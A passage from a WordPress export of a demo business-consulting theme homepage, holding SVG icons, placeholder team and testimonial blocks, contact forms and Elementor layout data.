c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>	        
				<h5>Support Functions</h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5>Finance Planning</h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
										<img width="710" height="620" src="https://maxbizz.s3.amazonaws.com/images/image3-home4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image3-home4.jpg 710w, https://maxbizz.s3.amazonaws.com/images/image3-home4-300x262.jpg 300w" sizes="(max-width: 710px) 100vw, 710px" />											
	        TO BECOME A CLIENT	        <h3>Ready to Get Started?</h3>	    
		<p>Please, fulfill the form to get a consultation. After processing the data, a personal manager will contact you.</p>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f1536-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="1536" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f1536-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="email" name="your-phone" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Phone *" /></p>
<p><input type="email" name="your-subject" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Subject *" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">submit now</button>
</form>		
	        WE ARE THERE FOR YOU	        <h3>Meet Our Professional Team</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<a href="#"><img width="195" height="195" src="https://maxbizz.s3.amazonaws.com/images/team1-circle.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1-circle.png 195w, https://maxbizz.s3.amazonaws.com/images/team1-circle-150x150.png 150w" sizes="(max-width: 195px) 100vw, 195px" /></a>			
				<h6><a href="#">Monica Black</a></h6>				chief communication officer								
																								<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
				<a href="#"><img width="195" height="195" src="https://maxbizz.s3.amazonaws.com/images/team2-circle.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2-circle.png 195w, https://maxbizz.s3.amazonaws.com/images/team2-circle-150x150.png 150w" sizes="(max-width: 195px) 100vw, 195px" /></a>			
				<h6><a href="#">Peter Perish</a></h6>				chief business project								
																								<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
				<a href="#"><img width="195" height="195" src="https://maxbizz.s3.amazonaws.com/images/team3-circle.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3-circle.png 195w, https://maxbizz.s3.amazonaws.com/images/team3-circle-150x150.png 150w" sizes="(max-width: 195px) 100vw, 195px" /></a>			
				<h6><a href="#">Peter Perish</a></h6>				international Consultant								
																								<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
				<a href="#"><img width="195" height="195" src="https://maxbizz.s3.amazonaws.com/images/team4-circle.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4-circle.png 195w, https://maxbizz.s3.amazonaws.com/images/team4-circle-150x150.png 150w" sizes="(max-width: 195px) 100vw, 195px" /></a>			
				<h6><a href="#">Peter Perish</a></h6>				co-founder of company								
																								<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
																														<a rel="nofollow" 
									href="https://"">
																</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-team/">view all</a>
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees.”			
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees.”			
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees.”			
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees.”			
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
	        business blog	        <h3>Read Our Latest Insights</h3>	    
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/blog/">view all</a>
					<article id="post-447">
									<a href="http://wpdemo.archiwp.com/maxbizz-corporate/category/business/" rel="category tag">business</a>									<a href="http://wpdemo.archiwp.com/maxbizz-corporate/contactless-payments-time-has-come/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/blog-1-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/contactless-payments-time-has-come/" rel="bookmark">Contactless Payments’ Time Has Come</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz-corporate/contactless-payments-time-has-come/" rel="bookmark"><time datetime="2020-09-04T09:09:22+00:00">September 4, 2020</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/contactless-payments-time-has-come/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz-corporate/contactless-payments-time-has-come/"></a>
					</article>
					<article id="post-430">
									<a href="http://wpdemo.archiwp.com/maxbizz-corporate/category/business/" rel="category tag">business</a> <a href="http://wpdemo.archiwp.com/maxbizz-corporate/category/marketing/" rel="category tag">marketing</a>									<a href="http://wpdemo.archiwp.com/maxbizz-corporate/the-future-of-retail-asias-ecosystems/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/gallery-1-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/the-future-of-retail-asias-ecosystems/" rel="bookmark">The Future of Retail: Asia’s Ecosystems</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz-corporate/the-future-of-retail-asias-ecosystems/" rel="bookmark"><time datetime="2020-02-24T09:00:43+00:00">February 24, 2020</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/the-future-of-retail-asias-ecosystems/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz-corporate/the-future-of-retail-asias-ecosystems/"></a>
					</article>
					<article id="post-434">
									<a href="http://wpdemo.archiwp.com/maxbizz-corporate/category/marketing/" rel="category tag">marketing</a>									<a href="http://wpdemo.archiwp.com/maxbizz-corporate/digital-transformation-roadmap-enablers/">
										<img width="600" height="400" src="https://maxbizz.s3.amazonaws.com/images/gallery-2-1-600x400.jpg" alt="" loading="lazy" />									</a>
									<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/digital-transformation-roadmap-enablers/" rel="bookmark">Digital Transformation Roadmap: Enablers</a></h5>
								<a href="http://wpdemo.archiwp.com/maxbizz-corporate/digital-transformation-roadmap-enablers/" rel="bookmark"><time datetime="2019-08-14T09:02:49+00:00">August 14, 2019</time></a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/author/admin/">Tom Black</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/digital-transformation-roadmap-enablers/#respond">0 Comments</a>								<a href="http://wpdemo.archiwp.com/maxbizz-corporate/digital-transformation-roadmap-enablers/"></a>
					</article>
										<img src="https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg" alt="" loading="lazy" />											
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f741-o2" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o2" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1023</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:28:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:28:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[home]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"39dfd74","elType":"section","settings":{"margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image-banner-home4.jpg","id":1819},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"170","right":"0","bottom":"235","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"150","right":"0","bottom":"180","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"120","right":"0","bottom":"100","left":"0","isLinked":false}},"elements":[{"id":"ec51567","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8f5fe55","elType":"widget","settings":{"title":"financial services solutions","header_size":"h6","title_color":"#55BB53","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":11,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"15","left":"0","isLinked":false},"_padding":{"unit":"px","top":"6","right":"12","bottom":"5","left":"12","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"2","isLinked":false},"_border_color":"#55BB53","_border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":4,"vertical":4,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"_element_width":"auto"},"elements":[],"widgetType":"heading"},{"id":"a303cb7","elType":"widget","settings":{"title":"We Deliver Digital<br> Strategy<span class=\"hl-text\"> & Analytics<\/span>","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":60,"sizes":[]},"typography_font_weight":"bold","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"typography_letter_spacing":{"unit":"px","size":-1.1999999999999999555910790149937383830547332763671875,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"614820f","elType":"widget","settings":{"editor":"<p>We are boutique firm designed for Private Equity, Family Offices, and<br \/>Growth-Stage Companies seeking to maximize results<\/p>","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":18,"sizes":[]},"typography_font_weight":"400","_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":16,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0c4fd2e","elType":"widget","settings":{"text":"Explore More ","_element_width":"auto","btn_padding":{"unit":"px","top":"17","right":"35","bottom":"17","left":"35","isLinked":false},"btn_padding_mobile":{"unit":"px","top":"12","right":"25","bottom":"12","left":"25","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"},{"id":"e3d0287","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title":"Have Any Questions?","des":"+1-800-456-478-23","icon_color":"#55BB53","title_color":"#5F5F5F","des_color":"#0B2A41","icon_space":{"unit":"px","size":70,"sizes":[]},"icon_size":{"unit":"px","size":20,"sizes":[]},"icon_bg_width":{"unit":"px","size":56,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":4,"vertical":4,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_space_top":{"unit":"px","size":8,"sizes":[]},"title_space_bottom":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","des_typography_typography":"custom","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"des_typography_font_weight":"bold","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_element_width":"auto","icon_bg":"#FFFFFF"},"elements":[],"widgetType":"iiconbox2"}],"isInner":false}],"isInner":false},{"id":"cbfbdeb","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","padding":{"unit":"px","top":"30","right":"15","bottom":"30","left":"15","isLinked":false}},"elements":[{"id":"c3cb4ed","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"da35de6","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","is_line":"","title_color":"#0B2A41","des_color":"#60626D","title_hover_color":"#FFFFFF","des_hcolor":"#AFC1CE","icon_space_mobile":{"unit":"px","size":75,"sizes":[]},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_space_bottom":{"unit":"px","size":8,"sizes":[]},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_background_hover_background":"classic","_background_hover_color":"#0B2A41","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"icon_bg":"#02010100","icon_space":{"unit":"px","size":84,"sizes":[]},"content_padding":{"unit":"px","top":"16","right":"30","bottom":"25","left":"12","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"512836d","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"b6ed3d4","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-1.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth.","is_line":"","title_color":"#0B2A41","des_color":"#60626D","title_hover_color":"#FFFFFF","des_hcolor":"#AFC1CE","icon_space_mobile":{"unit":"px","size":75,"sizes":[]},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_space_bottom":{"unit":"px","size":8,"sizes":[]},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_background_hover_background":"classic","_background_hover_color":"#0B2A41","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"icon_bg":"#02010100","icon_space":{"unit":"px","size":88,"sizes":[]},"content_padding":{"unit":"px","top":"16","right":"30","bottom":"25","left":"12","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"1fc0eff","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5282d88","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/card.svg","id":638},"library":"svg"},"title":"Consumer Products","des":"We help financial institutions, from banking and insurance to wealth.","is_line":"","title_color":"#0B2A41","des_color":"#60626D","title_hover_color":"#FFFFFF","des_hcolor":"#AFC1CE","icon_space_mobile":{"unit":"px","size":75,"sizes":[]},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_space_bottom":{"unit":"px","size":8,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_background_hover_background":"classic","_background_hover_color":"#0B2A41","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"icon_bg":"#02010100","icon_space":{"unit":"px","size":90,"sizes":[]},"content_padding":{"unit":"px","top":"16","right":"30","bottom":"25","left":"12","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"23b0fa5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"d263e70","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Airlines & Transport","des":"We help financial institutions, from banking and insurance to wealth.","is_line":"","title_color":"#0B2A41","des_color":"#60626D","title_hover_color":"#FFFFFF","des_hcolor":"#AFC1CE","icon_space_mobile":{"unit":"px","size":75,"sizes":[]},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":"rgba(0,0,0,0.5)"},"title_space_bottom":{"unit":"px","size":8,"sizes":[]},"_background_hover_background":"classic","_background_hover_color":"#0B2A41","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"icon_bg":"#02010100","icon_space":{"unit":"px","size":88,"sizes":[]},"content_padding":{"unit":"px","top":"16","right":"30","bottom":"25","left":"12","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false}],"isInner":false},{"id":"4c31c8f","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"22","padding":{"unit":"px","top":"100","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"61532bf","elType":"column","settings":{"_column_size":66,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"45e488c","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home4.jpg","id":1831},"image_size":"full","align":"left","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"c5fca5d","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true}},"elements":[{"id":"fcc3816","elType":"widget","settings":{"sub":"innovative solutions","title":"Transform Your  Ideas into<span class=\"hl-text\"> a Product<\/span>","header_size":"h3","subtitle_style":"is_line","stitle_color":"#95A2AC","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bottom_space":{"unit":"px","size":6,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"8515723","elType":"widget","settings":{"editor":"<p>The main goal of company is to spread a culture of sustainable development and synergy between the private sector, public sector and civil 